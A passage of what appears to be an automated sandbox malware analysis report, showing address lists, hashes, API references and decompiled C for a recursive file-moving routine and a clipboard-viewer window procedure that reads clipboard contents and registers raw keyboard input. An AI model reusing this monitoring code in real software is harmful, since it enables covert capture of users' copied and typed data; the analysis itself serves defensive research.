                                                                                                                                                                                                                                                                                    0x00407065
                                                                                                                                                                                                                                                                                    0x00407068
                                                                                                                                                                                                                                                                                    0x0040706b
                                                                                                                                                                                                                                                                                    0x00407090
                                                                                                                                                                                                                                                                                    0x00407093
                                                                                                                                                                                                                                                                                    0x0040709e
                                                                                                                                                                                                                                                                                    0x004070a9
                                                                                                                                                                                                                                                                                    0x004070ac
                                                                                                                                                                                                                                                                                    0x004070b7
                                                                                                                                                                                                                                                                                    0x004070c2
                                                                                                                                                                                                                                                                                    0x004070c5
                                                                                                                                                                                                                                                                                    0x004070c8
                                                                                                                                                                                                                                                                                    0x004070cc
                                                                                                                                                                                                                                                                                    0x004070d3
                                                                                                                                                                                                                                                                                    0x004070d9
                                                                                                                                                                                                                                                                                    0x004070dc
                                                                                                                                                                                                                                                                                    0x004070df
                                                                                                                                                                                                                                                                                    0x004070f6
                                                                                                                                                                                                                                                                                    0x004070f9
                                                                                                                                                                                                                                                                                    0x004070fc
                                                                                                                                                                                                                                                                                    0x004070ff
                                                                                                                                                                                                                                                                                    0x00407110
                                                                                                                                                                                                                                                                                    0x00407113
                                                                                                                                                                                                                                                                                    0x00407116
                                                                                                                                                                                                                                                                                    0x00407119
                                                                                                                                                                                                                                                                                    0x0040711c
                                                                                                                                                                                                                                                                                    0x0040711f
                                                                                                                                                                                                                                                                                    0x00407138
                                                                                                                                                                                                                                                                                    0x0040713b
                                                                                                                                                                                                                                                                                    0x0040713e
                                                                                                                                                                                                                                                                                    0x00407141
                                                                                                                                                                                                                                                                                    0x00407144
                                                                                                                                                                                                                                                                                    0x00407147
                                                                                                                                                                                                                                                                                    0x0040716c
                                                                                                                                                                                                                                                                                    0x0040716f
                                                                                                                                                                                                                                                                                    0x0040717a
                                                                                                                                                                                                                                                                                    0x00407185
                                                                                                                                                                                                                                                                                    0x00407188
                                                                                                                                                                                                                                                                                    0x00407193
                                                                                                                                                                                                                                                                                    0x0040719e
                                                                                                                                                                                                                                                                                    0x004071a1
                                                                                                                                                                                                                                                                                    0x004071a4
                                                                                                                                                                                                                                                                                    0x004071a8
                                                                                                                                                                                                                                                                                    0x004071af
                                                                                                                                                                                                                                                                                    0x004071b5
                                                                                                                                                                                                                                                                                    0x004071b8
                                                                                                                                                                                                                                                                                    0x004071bb
                                                                                                                                                                                                                                                                                    0x004071d2
                                                                                                                                                                                                                                                                                    0x004071d5
                                                                                                                                                                                                                                                                                    0x004071d8
                                                                                                                                                                                                                                                                                    0x004071db
                                                                                                                                                                                                                                                                                    0x004071ec
                                                                                                                                                                                                                                                                                    0x004071ef
                                                                                                                                                                                                                                                                                    0x004071f2
                                                                                                                                                                                                                                                                                    0x004071f5
                                                                                                                                                                                                                                                                                    0x004071f8
                                                                                                                                                                                                                                                                                    0x004071fb
                                                                                                                                                                                                                                                                                    0x00407214
                                                                                                                                                                                                                                                                                    0x00407217
                                                                                                                                                                                                                                                                                    0x0040721a
                                                                                                                                                                                                                                                                                    0x0040721d
                                                                                                                                                                                                                                                                                    0x00407220
                                                                                                                                                                                                                                                                                    0x00407223
                                                                                                                                                                                                                                                                                    0x00407248
                                                                                                                                                                                                                                                                                    0x0040724b
                                                                                                                                                                                                                                                                                    0x00407256
                                                                                                                                                                                                                                                                                    0x00407261
                                                                                                                                                                                                                                                                                    0x00407264
                                                                                                                                                                                                                                                                                    0x0040726f
                                                                                                                                                                                                                                                                                    0x0040727a
                                                                                                                                                                                                                                                                                    0x0040727d
                                                                                                                                                                                                                                                                                    0x00407280
                                                                                                                                                                                                                                                                                    0x00407284
                                                                                                                                                                                                                                                                                    0x0040728b
                                                                                                                                                                                                                                                                                    0x00407291
                                                                                                                                                                                                                                                                                    0x00407294
                                                                                                                                                                                                                                                                                    0x00407297
                                                                                                                                                                                                                                                                                    0x004072ae
                                                                                                                                                                                                                                                                                    0x004072b1
                                                                                                                                                                                                                                                                                    0x004072b4
                                                                                                                                                                                                                                                                                    0x004072b7
                                                                                                                                                                                                                                                                                    0x004072c8
                                                                                                                                                                                                                                                                                    0x004072cb
                                                                                                                                                                                                                                                                                    0x004072ce
                                                                                                                                                                                                                                                                                    0x004072d1
                                                                                                                                                                                                                                                                                    0x004072d4
                                                                                                                                                                                                                                                                                    0x004072d7
                                                                                                                                                                                                                                                                                    0x004072f0
                                                                                                                                                                                                                                                                                    0x004072f3
                                                                                                                                                                                                                                                                                    0x004072f6
                                                                                                                                                                                                                                                                                    0x004072f9
                                                                                                                                                                                                                                                                                    0x004072fc
                                                                                                                                                                                                                                                                                    0x004072ff
                                                                                                                                                                                                                                                                                    0x00407324
                                                                                                                                                                                                                                                                                    0x00407327
                                                                                                                                                                                                                                                                                    0x00407332
                                                                                                                                                                                                                                                                                    0x0040733d
                                                                                                                                                                                                                                                                                    0x00407340
                                                                                                                                                                                                                                                                                    0x0040734b
                                                                                                                                                                                                                                                                                    0x00407356
                                                                                                                                                                                                                                                                                    0x00407359
                                                                                                                                                                                                                                                                                    0x0040735c
                                                                                                                                                                                                                                                                                    0x00407360
                                                                                                                                                                                                                                                                                    0x00407367
                                                                                                                                                                                                                                                                                    0x0040736d
                                                                                                                                                                                                                                                                                    0x00407370
                                                                                                                                                                                                                                                                                    0x00407373
                                                                                                                                                                                                                                                                                    0x0040738a
                                                                                                                                                                                                                                                                                    0x0040738d
                                                                                                                                                                                                                                                                                    0x00407390
                                                                                                                                                                                                                                                                                    0x00407393
                                                                                                                                                                                                                                                                                    0x004073a4
                                                                                                                                                                                                                                                                                    0x004073a7
                                                                                                                                                                                                                                                                                    0x004073aa
                                                                                                                                                                                                                                                                                    0x004073ad
                                                                                                                                                                                                                                                                                    0x004073b0
                                                                                                                                                                                                                                                                                    0x004073b3
                                                                                                                                                                                                                                                                                    0x004073cc
                                                                                                                                                                                                                                                                                    0x004073cf
                                                                                                                                                                                                                                                                                    0x004073d2
                                                                                                                                                                                                                                                                                    0x004073d5
                                                                                                                                                                                                                                                                                    0x004073d8
                                                                                                                                                                                                                                                                                    0x004073db
                                                                                                                                                                                                                                                                                    0x004073fa
                                                                                                                                                                                                                                                                                    0x004073fd
                                                                                                                                                                                                                                                                                    0x00407408
                                                                                                                                                                                                                                                                                    0x00407413
                                                                                                                                                                                                                                                                                    0x00407416
                                                                                                                                                                                                                                                                                    0x00407421
                                                                                                                                                                                                                                                                                    0x0040742c
                                                                                                                                                                                                                                                                                    0x0040742f
                                                                                                                                                                                                                                                                                    0x00407432
                                                                                                                                                                                                                                                                                    0x00407436
                                                                                                                                                                                                                                                                                    0x00407442
                                                                                                                                                                                                                                                                                    0x00407453
                                                                                                                                                                                                                                                                                    0x00407468
                                                                                                                                                                                                                                                                                    0x00407472
                                                                                                                                                                                                                                                                                    0x00407475
                                                                                                                                                                                                                                                                                    0x0040747e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040747e
                                                                                                                                                                                                                                                                                    0x00407486
                                                                                                                                                                                                                                                                                    0x0040748b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040748b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f79167b87464b51aed7931ecb4457fc5cd18322fd9671e80785650c02d4eccdb
                                                                                                                                                                                                                                                                                    • Instruction ID: 90cb864cc2477ce68059d36ebfae5716939ce24ee9ac182e6e4708cb2ec1aab6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f79167b87464b51aed7931ecb4457fc5cd18322fd9671e80785650c02d4eccdb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89D22B79D11619EFCB54CF99C18099EFBF1FF88320F66859AD845AB305C630AA91DF80
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 485 404e80-404ecf CreateDirectoryW wsprintfW FindFirstFileW 486 404ed5-404ee9 lstrcmpW 485->486 487 404faf-404fb2 485->487 488 404f01 486->488 489 404eeb-404eff lstrcmpW 486->489 491 404f7c-404f92 FindNextFileW 488->491 489->488 490 404f03-404f4c wsprintfW * 2 489->490 493 404f66-404f76 MoveFileExW 490->493 494 404f4e-404f64 call 404e80 490->494 491->486 492 404f98-404fa9 FindClose RemoveDirectoryW 491->492 492->487 493->491 494->491
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404E80(WCHAR* _a4, char _a8) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAW _v1116;
                                                                                                                                                                                                                                                                                    				void* _v1120;
                                                                                                                                                                                                                                                                                    				short _v1644;
                                                                                                                                                                                                                                                                                    				short _v2164;
                                                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                                                    				void* _t60;
                                                                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1 =  &_a8; // 0x40544b
                                                                                                                                                                                                                                                                                    				CreateDirectoryW( *_t1, 0);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                                    				_t61 = _t60 + 0xc;
                                                                                                                                                                                                                                                                                    				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                                                                                                                                                                                                                    				_v1120 = _t29;
                                                                                                                                                                                                                                                                                    				if(_v1120 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					return _t29;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                                    						_t14 =  &_a8; // 0x40544b
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                                    						_t61 = _t61 + 0x20;
                                                                                                                                                                                                                                                                                    						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                    							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							E00404E80( &_v1644,  &_v2164);
                                                                                                                                                                                                                                                                                    							_t61 = _t61 + 8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                                                                                                                                                                                                                    				FindClose(_v1120);
                                                                                                                                                                                                                                                                                    				return RemoveDirectoryW(_a4);
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x00404e8b
                                                                                                                                                                                                                                                                                    0x00404e8f
                                                                                                                                                                                                                                                                                    0x00404ea5
                                                                                                                                                                                                                                                                                    0x00404eab
                                                                                                                                                                                                                                                                                    0x00404ebc
                                                                                                                                                                                                                                                                                    0x00404ec2
                                                                                                                                                                                                                                                                                    0x00404ecf
                                                                                                                                                                                                                                                                                    0x00404fb2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404ed5
                                                                                                                                                                                                                                                                                    0x00404ed5
                                                                                                                                                                                                                                                                                    0x00404ee9
                                                                                                                                                                                                                                                                                    0x00404f1a
                                                                                                                                                                                                                                                                                    0x00404f2a
                                                                                                                                                                                                                                                                                    0x00404f3a
                                                                                                                                                                                                                                                                                    0x00404f40
                                                                                                                                                                                                                                                                                    0x00404f4c
                                                                                                                                                                                                                                                                                    0x00404f76
                                                                                                                                                                                                                                                                                    0x00404f4e
                                                                                                                                                                                                                                                                                    0x00404f5c
                                                                                                                                                                                                                                                                                    0x00404f61
                                                                                                                                                                                                                                                                                    0x00404f61
                                                                                                                                                                                                                                                                                    0x00404f4c
                                                                                                                                                                                                                                                                                    0x00404f90
                                                                                                                                                                                                                                                                                    0x00404f9f
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(KT@,00000000), ref: 00404E8F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404EA5
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00404EBC
                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,0041160C), ref: 00404EE1
                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,00411610), ref: 00404EF7
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404F1A
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404F3A
                                                                                                                                                                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404F76
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 00404F8A
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 00404F9F
                                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00404FA9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*$KT@
                                                                                                                                                                                                                                                                                    • API String ID: 92872011-1718218466
                                                                                                                                                                                                                                                                                    • Opcode ID: 4e32471b6f213224bbe50e7f945d3dfc794eb29b83275571e89e3b03adfc3a4e
                                                                                                                                                                                                                                                                                    • Instruction ID: f84c23499f796ae609c643b61d0d113fdbb715ac4c7aa211f5e11142a609d372
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e32471b6f213224bbe50e7f945d3dfc794eb29b83275571e89e3b03adfc3a4e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 553145B5500218ABCB10DFA0DC88FDA7778BB88301F0085A9F709A6195DB79DAC4CF98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 497 4041a0-4041c2 GetWindowLongW 498 4041c4-4041cb 497->498 499 4041e6-4041ed 497->499 500 4041d1-4041d5 498->500 501 404257-404268 IsClipboardFormatAvailable 498->501 502 404216-40421c 499->502 503 4041ef 499->503 506 4041f4-404211 SetClipboardViewer SetWindowLongW 500->506 507 4041d7-4041db 500->507 504 404273-40427d IsClipboardFormatAvailable 501->504 505 40426a-404271 501->505 509 404236-40423a 502->509 510 40421e-404234 SetWindowLongW 502->510 508 4043d4-4043ed DefWindowProcA 503->508 512 404288-404292 IsClipboardFormatAvailable 504->512 513 40427f-404286 504->513 511 40429b-40429f 505->511 506->508 514 4041e1 507->514 515 40438d-4043ce RegisterRawInputDevices ChangeClipboardChain 507->515 516 404252 509->516 517 40423c-40424c SendMessageA 509->517 510->516 519 4042a5-4042af OpenClipboard 511->519 520 40436f-404373 511->520 512->511 518 404294 512->518 513->511 514->508 515->508 516->508 517->516 518->511 519->520 521 4042b5-4042c6 GetClipboardData 519->521 522 404375-404385 SendMessageA 520->522 523 40438b 520->523 524 4042c8 521->524 525 4042cd-4042de GlobalLock 521->525 522->523 523->508 524->508 526 4042e0 525->526 527 4042e5-4042f6 525->527 526->508 528 4042f8-4042fc 527->528 529 404319-40432c call 403fb0 527->529 531 40432e-40433e call 4040d0 528->531 532 4042fe-404302 528->532 538 404341-404355 GlobalUnlock CloseClipboard 529->538 531->538 535 404304 532->535 536 404306-404317 call 403ef0 532->536 535->538 536->538 538->520 541 404357-40436c call 403480 call 408c70 538->541 541->520
                                                                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                    			E004041A0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                                                                                                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                                                    				struct HWND__* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                                                                                                    				short _v34;
                                                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                                                                                                    				int _v44;
                                                                                                                                                                                                                                                                                    				struct HWND__* _t90;
                                                                                                                                                                                                                                                                                    				struct HWND__* _t97;
                                                                                                                                                                                                                                                                                    				struct HWND__* _t98;
                                                                                                                                                                                                                                                                                    				void* _t129;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                                                                                                                                                                                                                    				_v40 = _a8;
                                                                                                                                                                                                                                                                                    				if(_v40 > 0x308) {
                                                                                                                                                                                                                                                                                    					if(_v40 == 0x30d) {
                                                                                                                                                                                                                                                                                    						if(_a12 != _v8) {
                                                                                                                                                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v8 = _a16;
                                                                                                                                                                                                                                                                                    							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						L38:
                                                                                                                                                                                                                                                                                    						return DefWindowProcA(_a4, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v40 == 0x308) {
                                                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                                                    					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                                                                                                                                                                                                                    						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                                                                                                                                                                                                                    							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                                                                                                                                                                                                                    								_v12 = 7;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v12 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v12 = 0xd;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                                                                                                                                                                                                                    						L34:
                                                                                                                                                                                                                                                                                    						if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v24 = GetClipboardData(_v12);
                                                                                                                                                                                                                                                                                    						if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    							_v20 = GlobalLock(_v24);
                                                                                                                                                                                                                                                                                    							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    								_v16 = 0;
                                                                                                                                                                                                                                                                                    								_v44 = _v12;
                                                                                                                                                                                                                                                                                    								if(_v44 == 1) {
                                                                                                                                                                                                                                                                                    									_t90 = E00403FB0(_v20, 0, 0);
                                                                                                                                                                                                                                                                                    									_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                                    									_v16 = _t90;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									if(_v44 == 7) {
                                                                                                                                                                                                                                                                                    										_t97 = E004040D0(_v20, 0, 0);
                                                                                                                                                                                                                                                                                    										_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                                    										_v16 = _t97;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										if(_v44 == 0xd) {
                                                                                                                                                                                                                                                                                    											_t98 = E00403EF0(_v20, _v20, 0);
                                                                                                                                                                                                                                                                                    											_t129 = _t129 + 8;
                                                                                                                                                                                                                                                                                    											_v16 = _t98;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								GlobalUnlock(_v24);
                                                                                                                                                                                                                                                                                    								CloseClipboard();
                                                                                                                                                                                                                                                                                    								if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    									E00403480(_v16);
                                                                                                                                                                                                                                                                                    									E00408C70(_v16);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L38;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L38;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v40 == 1) {
                                                                                                                                                                                                                                                                                    					_v8 = SetClipboardViewer(_a4);
                                                                                                                                                                                                                                                                                    					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_v40 == 2) {
                                                                                                                                                                                                                                                                                    						_v36 = 0;
                                                                                                                                                                                                                                                                                    						_v34 = 0;
                                                                                                                                                                                                                                                                                    						_v30 = 0;
                                                                                                                                                                                                                                                                                    						_v26 = 0;
                                                                                                                                                                                                                                                                                    						_v36 = 1;
                                                                                                                                                                                                                                                                                    						_v34 = 6;
                                                                                                                                                                                                                                                                                    						_v32 = 1;
                                                                                                                                                                                                                                                                                    						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                                                                                                                                                                                                                    						ChangeClipboardChain(_a4, _v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L38;
                                                                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                                                                    0x004041b2
                                                                                                                                                                                                                                                                                    0x004041b8
                                                                                                                                                                                                                                                                                    0x004041c2
                                                                                                                                                                                                                                                                                    0x004041ed
                                                                                                                                                                                                                                                                                    0x0040421c
                                                                                                                                                                                                                                                                                    0x0040423a
                                                                                                                                                                                                                                                                                    0x0040424c
                                                                                                                                                                                                                                                                                    0x0040424c
                                                                                                                                                                                                                                                                                    0x0040421e
                                                                                                                                                                                                                                                                                    0x00404221
                                                                                                                                                                                                                                                                                    0x0040422e
                                                                                                                                                                                                                                                                                    0x0040422e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004041ef
                                                                                                                                                                                                                                                                                    0x004043d4
                                                                                                                                                                                                                                                                                    0x004043ed
                                                                                                                                                                                                                                                                                    0x004043ed
                                                                                                                                                                                                                                                                                    0x004041ed
                                                                                                                                                                                                                                                                                    0x004041cb
                                                                                                                                                                                                                                                                                    0x00404257
                                                                                                                                                                                                                                                                                    0x00404268
                                                                                                                                                                                                                                                                                    0x0040427d
                                                                                                                                                                                                                                                                                    0x00404292
                                                                                                                                                                                                                                                                                    0x00404294
                                                                                                                                                                                                                                                                                    0x00404294
                                                                                                                                                                                                                                                                                    0x0040427f
                                                                                                                                                                                                                                                                                    0x0040427f
                                                                                                                                                                                                                                                                                    0x0040427f
                                                                                                                                                                                                                                                                                    0x0040426a
                                                                                                                                                                                                                                                                                    0x0040426a
                                                                                                                                                                                                                                                                                    0x0040426a
                                                                                                                                                                                                                                                                                    0x0040429f
                                                                                                                                                                                                                                                                                    0x0040436f
                                                                                                                                                                                                                                                                                    0x00404373
                                                                                                                                                                                                                                                                                    0x00404385
                                                                                                                                                                                                                                                                                    0x00404385
                                                                                                                                                                                                                                                                                    0x004042b5
                                                                                                                                                                                                                                                                                    0x004042bf
                                                                                                                                                                                                                                                                                    0x004042c6
                                                                                                                                                                                                                                                                                    0x004042d7
                                                                                                                                                                                                                                                                                    0x004042de
                                                                                                                                                                                                                                                                                    0x004042e5
                                                                                                                                                                                                                                                                                    0x004042ef
                                                                                                                                                                                                                                                                                    0x004042f6
                                                                                                                                                                                                                                                                                    0x00404321
                                                                                                                                                                                                                                                                                    0x00404326
                                                                                                                                                                                                                                                                                    0x00404329
                                                                                                                                                                                                                                                                                    0x004042f8
                                                                                                                                                                                                                                                                                    0x004042fc
                                                                                                                                                                                                                                                                                    0x00404336
                                                                                                                                                                                                                                                                                    0x0040433b
                                                                                                                                                                                                                                                                                    0x0040433e
                                                                                                                                                                                                                                                                                    0x004042fe
                                                                                                                                                                                                                                                                                    0x00404302
                                                                                                                                                                                                                                                                                    0x0040430c
                                                                                                                                                                                                                                                                                    0x00404311
                                                                                                                                                                                                                                                                                    0x00404314
                                                                                                                                                                                                                                                                                    0x00404314
                                                                                                                                                                                                                                                                                    0x00404302
                                                                                                                                                                                                                                                                                    0x004042fc
                                                                                                                                                                                                                                                                                    0x00404345
                                                                                                                                                                                                                                                                                    0x0040434b
                                                                                                                                                                                                                                                                                    0x00404355
                                                                                                                                                                                                                                                                                    0x0040435b
                                                                                                                                                                                                                                                                                    0x00404367
                                                                                                                                                                                                                                                                                    0x0040436c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404355
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004042e0
                                                                                                                                                                                                                                                                                    0x004042c8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040429f
                                                                                                                                                                                                                                                                                    0x004041d5
                                                                                                                                                                                                                                                                                    0x004041fe
                                                                                                                                                                                                                                                                                    0x0040420b
                                                                                                                                                                                                                                                                                    0x004041d7
                                                                                                                                                                                                                                                                                    0x004041db
                                                                                                                                                                                                                                                                                    0x0040438f
                                                                                                                                                                                                                                                                                    0x00404395
                                                                                                                                                                                                                                                                                    0x00404398
                                                                                                                                                                                                                                                                                    0x0040439b
                                                                                                                                                                                                                                                                                    0x004043a4
                                                                                                                                                                                                                                                                                    0x004043ad
                                                                                                                                                                                                                                                                                    0x004043b1
                                                                                                                                                                                                                                                                                    0x004043c0
                                                                                                                                                                                                                                                                                    0x004043ce
                                                                                                                                                                                                                                                                                    0x004043ce
                                                                                                                                                                                                                                                                                    0x004041db
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004041AC
                                                                                                                                                                                                                                                                                    • SetClipboardViewer.USER32 ref: 004041F8
